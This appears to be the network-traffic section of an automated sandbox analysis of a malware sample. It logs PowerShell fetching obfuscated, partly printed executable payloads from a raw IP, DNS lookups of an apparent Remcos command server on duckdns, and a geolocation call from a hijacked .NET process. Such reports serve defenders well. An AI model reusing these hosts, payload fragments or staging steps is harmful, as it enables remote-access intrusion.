                                                                                                      Nov 20, 2024 09:36:24.258677006 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:36:24.308034897 CET497594576192.168.2.7190.9.223.135
                                                                                                      Nov 20, 2024 09:36:24.344582081 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:36:24.349914074 CET8049769178.237.33.50192.168.2.7
                                                                                                      Nov 20, 2024 09:36:24.349987030 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:36:24.350171089 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:36:24.355170965 CET8049769178.237.33.50192.168.2.7
                                                                                                      Nov 20, 2024 09:36:24.973278046 CET8049769178.237.33.50192.168.2.7
                                                                                                      Nov 20, 2024 09:36:24.973347902 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:36:24.982755899 CET497594576192.168.2.7190.9.223.135
                                                                                                      Nov 20, 2024 09:36:24.991451025 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:36:25.973086119 CET8049769178.237.33.50192.168.2.7
                                                                                                      Nov 20, 2024 09:36:25.973164082 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:36:26.083529949 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:36:26.091207981 CET497594576192.168.2.7190.9.223.135
                                                                                                      Nov 20, 2024 09:36:26.096128941 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:37:11.236579895 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:37:11.238027096 CET497594576192.168.2.7190.9.223.135
                                                                                                      Nov 20, 2024 09:37:11.242959976 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:37:56.507625103 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:37:56.509004116 CET497594576192.168.2.7190.9.223.135
                                                                                                      Nov 20, 2024 09:37:56.516257048 CET457649759190.9.223.135192.168.2.7
                                                                                                      Nov 20, 2024 09:38:14.308892965 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:38:14.731344938 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:38:15.340897083 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:38:16.542912960 CET4976980192.168.2.7178.237.33.50
                                                                                                      Nov 20, 2024 09:38:18.949162006 CET4976980192.168.2.7178.237.33.50

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Nov 20, 2024 09:36:20.182653904 CET6405953192.168.2.71.1.1.1
                                                                                                      Nov 20, 2024 09:36:20.189412117 CET53640591.1.1.1192.168.2.7
                                                                                                      Nov 20, 2024 09:36:21.390454054 CET6235353192.168.2.71.1.1.1
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET53623531.1.1.1192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.893431902 CET5601253192.168.2.71.1.1.1
                                                                                                      Nov 20, 2024 09:36:22.996946096 CET53560121.1.1.1192.168.2.7
                                                                                                      Nov 20, 2024 09:36:24.324858904 CET6309653192.168.2.71.1.1.1
                                                                                                      Nov 20, 2024 09:36:24.336985111 CET53630961.1.1.1192.168.2.7
                                                                                                      Nov 20, 2024 09:36:36.852986097 CET5841153192.168.2.71.1.1.1
                                                                                                      Nov 20, 2024 09:36:36.862502098 CET53584111.1.1.1192.168.2.7

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Nov 20, 2024 09:36:20.182653904 CET192.168.2.71.1.1.10x533fStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.390454054 CET192.168.2.71.1.1.10x3efcStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:22.893431902 CET192.168.2.71.1.1.10x479bStandard query (0)remcosnov24.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:24.324858904 CET192.168.2.71.1.1.10xa66eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:36.852986097 CET192.168.2.71.1.1.10x9c39Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Nov 20, 2024 09:36:20.189412117 CET1.1.1.1192.168.2.70x533fNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:20.189412117 CET1.1.1.1192.168.2.70x533fNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:20.189412117 CET1.1.1.1192.168.2.70x533fNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com52.217.196.57A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.108A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com52.217.107.148A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com54.231.196.81A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.217A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com52.217.123.1A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.80A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:21.419483900 CET1.1.1.1192.168.2.70x3efcNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.22A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:22.996946096 CET1.1.1.1192.168.2.70x479bNo error (0)remcosnov24.duckdns.org190.9.223.135A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:24.336985111 CET1.1.1.1192.168.2.70xa66eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                      Nov 20, 2024 09:36:36.862502098 CET1.1.1.1192.168.2.70x9c39No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • bitbucket.org
                                                                                                      • bbuseruploads.s3.amazonaws.com
                                                                                                      • 91.202.233.169
                                                                                                      • geoplugin.net

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.74969991.202.233.169807104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 20, 2024 09:36:10.150357008 CET190OUTGET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                      Host: 91.202.233.169
                                                                                                      Connection: Keep-Alive
                                                                                                      Nov 20, 2024 09:36:10.858876944 CET1236INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.20.2
                                                                                                      Date: Wed, 20 Nov 2024 08:36:10 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 106572
                                                                                                      Connection: keep-alive
                                                                                                      Last-Modified: Thu, 31 Oct 2024 04:54:03 GMT
                                                                                                      ETag: "1a04c-625be9b7df0c0"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Vary: Accept-Encoding
                                                                                                      Data Raw: 54 56 71 51 24 24 24 24 4d 24 24 24 24 24 24 24 24 45 24 24 24 24 24 24 24 24 2f 2f 38 24 24 24 24 4c 67 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 51 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 67 24 24 24 24 24 24 24 24 24 24 34 66 75 67 34 24 24 74 24 24 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 42 51 52 51 24 24 24 24 54 24 24 45 44 24 24 48 76 56 49 6d 63 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 4f 24 24 24 24 49 69 24 24 4c 24 24 56 24 24 24 24 24 24 4f 77 24 24 24 24 24 24 24 24 47 24 24 24 24 24 24 24 24 24 24 24 24 24 [TRUNCATED]
                                                                                                      Data Ascii: TVqQ$$$$M$$$$$$$$E$$$$$$$$//8$$$$Lg$$$$$$$$$$$$$$$$$$Q$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$g$$$$$$$$$$4fug4$$t$$nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ$$$$$$$$$$$$$$$$$$BQRQ$$$$T$$ED$$HvVImc$$$$$$$$$$$$$$$$$$$$O$$$$Ii$$L$$V$$$$$$Ow$$$$$$$$G$$$$$$$$$$$$$$$$bgoB$$$$$$g$$$$$$$$$$$$$$$$$$$$$$$$E$$$$g$$$$$$$$$$g$$$$B$$$$$$$$$$$$$$$$$$$$G$$$$$$$$$$$$$$$$$$$$Bg$$Q$$$$$$g$$$$$$$$$$$$$$$$M$$YIU$$$$B$$$$$$B$$$$$$$$$$$$E$$$$$$E$$$$$$$$$$$$$$$$B$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$BgK$$QBT$$$$$$$$$$C$$B$$$$$$E$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$E$$B$$$$w$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$I$$$$$$C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$CC$$$$$$Eg$$$$$$$$$$$$$$$$$$$$$$$$$$$$C50ZXh0$$$$$$$$dOo$$$$$$$$g$$$$$$$$7$$$$$$$$$$I$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$C$$$$$$G$$ucnNyYw$$$$$$$$$$
                                                                                                      Nov 20, 2024 09:36:10.858891964 CET1236INData Raw: 45 24 24 24 24 24 24 24 24 49 24 24 45 24 24 24 24 24 24 51 24 24 24 24 24 24 44 75 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 42 24 24 24 24 24 24 42 24 24 4c 6e 4a 6c 62 47 39 6a
                                                                                                      Data Ascii: E$$$$$$$$I$$E$$$$$$Q$$$$$$Du$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$B$$$$$$B$$LnJlbG9j$$$$$$M$$$$$$$$$$E$$B$$$$$$C$$$$$$$$8g$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Q$$$$$$Qg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$BQCgE$$$$$$$$$$$$Eg$$$$$$$$C$$$$U$$WKg
                                                                                                      Nov 20, 2024 09:36:10.858975887 CET448INData Raw: 42 51 43 46 43 6a 70 24 24 24 24 24 24 47 64 24 24 63 24 24 24 24 24 24 45 71 24 24 42 4d 77 24 24 67 24 24 64 24 24 24 24 24 24 24 24 24 24 67 24 24 24 24 45 51 24 24 43 6a 24 24 45 24 24 24 24 42 73 55 2f 67 45 4c 42 79 77 49 4b 24 24 45 24 24
                                                                                                      Data Ascii: BQCFCjp$$$$$$Gd$$c$$$$$$Eq$$BMw$$g$$d$$$$$$$$$$g$$$$EQ$$Cj$$E$$$$BsU/gELBywIK$$E$$$$CsKKwU$$$$gor$$$$YqJg$$D/hUB$$$$$$bKiY$$$$igP$$$$$$K$$Co$$$$$$$$TM$$Q$$L$$$$$$$$$$E$$$$BEg69I8$$CgG$$$$$$Kbwc$$$$$$oCKBE$$$$$$pvCQ$$$$CigK$$$$$$K$$hQo6Q$$$$BqU
                                                                                                      Nov 20, 2024 09:36:10.858987093 CET1236INData Raw: 24 24 24 24 24 45 6c 46 67 4b 69 43 69 43 55 30 7a 77 24 24 46 42 51 47 4b 4f 6b 24 24 24 24 24 24 59 6d 4b 67 24 24 24 24 45 7a 24 24 45 24 24 24 24 38 24 24 24 24 24 24 24 24 42 24 24 24 24 24 24 52 49 4b 33 54 50 24 24 24 24 55 46 42 51 6f 36
                                                                                                      Data Ascii: $$$$$ElFgKiCiCU0zw$$FBQGKOk$$$$$$YmKg$$$$Ez$$E$$$$8$$$$$$$$B$$$$$$RIK3TP$$$$UFBQo6Q$$$$BiYqHgIoFw$$$$Cio$$Ez$$E$$BM$$$$$$$$B$$$$$$RIMrTP$$$$UFBQo6Q$$$$BnQI$$$$$$CKg$$TM$$Q$$Ew$$$$$$$$E$$$$BEgitI8$$BQUFCjp$$$$$$Gd$$g$$$$$$IqHgIoDw$$$$Cio$$Ez$$E
                                                                                                      Nov 20, 2024 09:36:10.859071016 CET1236INData Raw: 38 24 24 24 24 24 24 6f 43 4b 44 24 24 24 24 24 24 24 24 5a 39 4a 67 24 24 24 24 42 24 24 4a 7a 48 24 24 24 24 24 24 43 6e 30 6e 24 24 24 24 24 24 45 4b 6c 34 43 24 24 78 38 59 59 79 67 75 24 24 24 24 24 24 47 24 24 79 44 2f 2f 2f 38 24 24 58 32
                                                                                                      Data Ascii: 8$$$$$$oCKD$$$$$$$$Z9Jg$$$$B$$JzH$$$$$$Cn0n$$$$$$EKl4C$$x8YYygu$$$$$$G$$yD///8$$X28+$$$$$$GKg$$bM$$Q$$vwE$$$$$$Q$$$$BEDL$$MXKwMWKw$$tBwJ7Jg$$$$BCoCeyc$$$$$$QDj$$Q$$$$$$FvHQ$$$$CnQT$$$$$$CCgYs$$xcr$$xYr$$DqG$$Q$$$$$$nsm$$$$$$E$$29$$$$$$$$GCwcs$
                                                                                                      Nov 20, 2024 09:36:10.859082937 CET1236INData Raw: 24 24 24 67 43 48 24 24 24 24 75 53 24 24 42 51 24 24 24 24 24 24 24 24 24 24 45 7a 24 24 43 24 24 49 51 24 24 24 24 24 24 24 24 47 24 24 24 24 24 24 52 24 24 43 67 76 24 24 24 24 24 24 4b 43 69 73 57 43 55 55 45 24 24 24 24 24 24 24 24 42 24 24
                                                                                                      Data Ascii: $$$gCH$$$$uS$$BQ$$$$$$$$$$Ez$$C$$IQ$$$$$$$$G$$$$$$R$$Cgv$$$$$$KCisWCUUE$$$$$$$$B$$$$$$$$Bg$$$$$$$$i$$$$$$$$Lg$$$$$$BcNK+Z+JQ$$$$BCCd$$$$$$$$bzk$$$$$$YMG$$0r0igq$$$$$$GCxYNK8gIKD$$$$$$$$osBxkNK7wXKwMWKw$$tC$$YIbzE$$$$$$oLBywDFisDFys$$LQcHKDE$$$
                                                                                                      Nov 20, 2024 09:36:10.859095097 CET1236INData Raw: 77 6b 54 45 7a 68 74 2f 76 2f 2f 46 68 4d 50 48 52 4d 54 4f 47 4c 2b 2f 2f 38 52 45 53 77 30 48 77 34 54 45 7a 68 56 2f 76 2f 2f 30 24 24 55 24 24 24 24 24 24 45 6f 43 24 24 24 24 24 24 43 6e 4b 6c 24 24 51 42 77 48 7a 51 55 46 6f 30 46 24 24 24
                                                                                                      Data Ascii: wkTEzht/v//FhMPHRMTOGL+//8RESw0Hw4TEzhV/v//0$$U$$$$$$EoC$$$$$$CnKl$$QBwHzQUFo0F$$$$$$BFCg5$$$$$$KEwUZExM4Lf7//xYr$$xcr$$C1$$ERBvPQ$$$$CiwDFisDFys$$LS8REY5pFzMoEREWmm8+$$$$$$Kbz8$$$$$$pyvwE$$cCh$$$$$$$$KL$$MWKwMXKw$$tBhEQEwgrEREPF1gTDxEPEQ6OaT9
                                                                                                      Nov 20, 2024 09:36:10.859107018 CET1236INData Raw: 24 24 24 24 24 6f 52 42 6d 39 4d 24 24 24 24 24 24 4b 24 24 6e 35 4e 24 24 24 24 24 24 4b 62 30 63 24 24 24 24 24 24 6f 66 46 52 4d 53 4f 4e 76 39 2f 2f 38 43 66 6b 6f 24 24 24 24 24 24 70 76 52 77 24 24 24 24 43 67 4a 2b 53 77 24 24 24 24 43 68
                                                                                                      Data Ascii: $$$$$oRBm9M$$$$$$K$$n5N$$$$$$Kb0c$$$$$$ofFRMSONv9//8Cfko$$$$$$pvRw$$$$CgJ+Sw$$$$ChEGb0w$$$$$$oCfk0$$$$$$pvRw$$$$ChsTEjiw/f//$$n5L$$$$$$KEQdvT$$$$$$CgJ+Wg$$$$ChENb1E$$$$$$oCEQpvWQ$$$$ChwTEjiG/f//$$n5L$$$$$$KEQRvT$$$$$$CgJ+Ww$$$$Cm9H$$$$$$K$$n5c
                                                                                                      Nov 20, 2024 09:36:10.859333038 CET1236INData Raw: 42 63 4b 4f 47 72 2f 2f 2f 38 71 45 7a 24 24 45 24 24 47 55 24 24 24 24 24 24 24 24 4a 24 24 24 24 24 24 52 24 24 24 24 49 6f 44 77 24 24 24 24 43 67 49 45 46 68 64 7a 5a 51 24 24 24 24 43 6e 4e 6d 24 24 24 24 24 24 4b 66 54 77 24 24 24 24 24 24
                                                                                                      Data Ascii: BcKOGr///8qEz$$E$$GU$$$$$$$$J$$$$$$R$$$$IoDw$$$$CgIEFhdzZQ$$$$CnNm$$$$$$KfTw$$$$$$QrGgZFBQ$$$$$$$$Q$$$$$$$$O$$$$$$$$GQ$$$$$$CQ$$$$$$$$u$$$$$$$$Fwor4gIoZw$$$$ChoKK9gC$$31B$$$$$$EG$$orzQIoRw$$$$BiYZCivCBChn$$$$$$KFgoruCo$$$$$$$$TM$$Q$$FwI$$$$$$o
                                                                                                      Nov 20, 2024 09:36:10.859350920 CET1236INData Raw: 55 45 24 24 24 24 24 24 24 24 42 24 24 24 24 24 24 24 24 42 45 24 24 24 24 24 24 24 24 59 24 24 24 24 24 24 24 24 4b 67 24 24 24 24 24 24 42 63 4d 4b 2b 59 43 65 30 24 24 24 24 24 24 24 24 51 47 6d 67 73 59 44 43 76 5a 42 69 77 74 46 67 77 72 30
                                                                                                      Data Ascii: UE$$$$$$$$B$$$$$$$$BE$$$$$$$$Y$$$$$$$$Kg$$$$$$BcMK+YCe0$$$$$$$$QGmgsYDCvZBiwtFgwr0gdvsg$$$$BgMoQ$$$$$$CiwHGQwrwBYr$$xcr$$C0LBwYXWG+x$$$$$$GByoGF1gKBgJ7Q$$$$$$BI5pMrgUKpICe0$$$$$$$$Qs$$xcr$$xYr$$C0CFCoCe0$$$$$$$$QDF1maJQNvsQ$$$$BioTM$$I$$Gw$$$$
                                                                                                      Nov 20, 2024 09:36:10.866863012 CET1236INData Raw: 59 62 32 73 24 24 24 24 24 24 6f 6d 24 24 6e 73 38 24 24 24 24 24 24 45 62 33 45 24 24 24 24 24 24 6f 67 75 72 34 24 24 24 24 53 34 43 46 69 6f 43 65 7a 77 24 24 24 24 24 24 52 76 61 67 24 24 24 24 43 6d 6f 4b 4b 79 63 52 42 45 55 49 24 24 24 24
                                                                                                      Data Ascii: Yb2s$$$$$$om$$ns8$$$$$$Eb3E$$$$$$ogur4$$$$S4CFioCezw$$$$$$Rvag$$$$CmoKKycRBEUI$$$$$$$$BQ$$$$$$BE$$$$$$$$j$$$$$$$$Lw$$$$$$Ds$$$$$$BH$$$$$$$$X$$$$$$$$HE$$$$$$$$bEwQr1$$IGKE0$$$$$$YdEwQry$$J7P$$$$$$BG9q$$$$$$KagwcEwQrtgIHKEo$$$$$$YWEwQrqgIJKEg$$$


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.74972691.202.233.169807104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 20, 2024 09:36:18.938357115 CET96OUTGET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1
                                                                                                      Host: 91.202.233.169
                                                                                                      Connection: Keep-Alive
                                                                                                      Nov 20, 2024 09:36:19.642822027 CET1236INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.20.2
                                                                                                      Date: Wed, 20 Nov 2024 08:36:19 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 270652
                                                                                                      Connection: keep-alive
                                                                                                      Last-Modified: Mon, 28 Oct 2024 02:59:44 GMT
                                                                                                      ETag: "4213c-62580a923c800"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Vary: Accept-Encoding
                                                                                                      Data Raw: 3d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 [TRUNCATED]
                                                                                                      Data Ascii: =
                                                                                                      Nov 20, 2024 09:36:19.642836094 CET224INData Raw: e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                                                      Data Ascii:
                                                                                                      Nov 20, 2024 09:36:19.643188000 CET1236INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94
                                                                                                      Data Ascii:
                                                                                                      Nov 20, 2024 09:36:19.643238068 CET1236INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94
                                                                                                      Data Ascii:
                                                                                                      Nov 20, 2024 09:36:19.643249035 CET1236INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94
                                                                                                      Data Ascii:
                                                                                                      Nov 20, 2024 09:36:19.643346071 CET1236INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94
                                                                                                      Data Ascii:
                                                                                                      Nov 20, 2024 09:36:19.643357992 CET1236INData Raw: 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                                      Data Ascii:
                                                                                                      Nov 20, 2024 09:36:19.643368959 CET1236INData Raw: 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                                      Data Ascii:
                                                                                                      Nov 20, 2024 09:36:19.643455029 CET1236INData Raw: 94 e2 93 94 e2 93 94 5a e2 93 94 e2 93 94 e2 93 94 38 47 e2 93 94 e2 93 94 e2 93 94 79 42 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4f e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                                                      Data Ascii: Z8GyBUEOPsBbQGugagEnBdkFoBU
                                                                                                      Nov 20, 2024 09:36:19.643470049 CET1236INData Raw: 93 94 e2 93 94 e2 93 94 6f 42 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 6c 42 51 62 e2 93 94 e2 93 94 e2 93 94 45 47 e2 93 94 e2 93 94 e2 93 94 4f 42
                                                                                                      Data Ascii: oBUlBQbEGOBbEGuBgcUG0BgbkEBDgDM4C
                                                                                                      Nov 20, 2024 09:36:19.647834063 CET1236INData Raw: 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 6f 42 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 49 47 e2 93 94 e2 93 94 e2 93 94 30 e2 93 94 e2 93
                                                                                                      Data Ascii: oBMIG0MDwMDBCGwb


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.749769178.237.33.50807536C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 20, 2024 09:36:24.350171089 CET71OUTGET /json.gp HTTP/1.1
                                                                                                      Host: geoplugin.net
                                                                                                      Cache-Control: no-cache
                                                                                                      Nov 20, 2024 09:36:24.973278046 CET1170INHTTP/1.1 200 OK
                                                                                                      date: Wed, 20 Nov 2024 08:36:24 GMT
                                                                                                      server: Apache
                                                                                                      content-length: 962
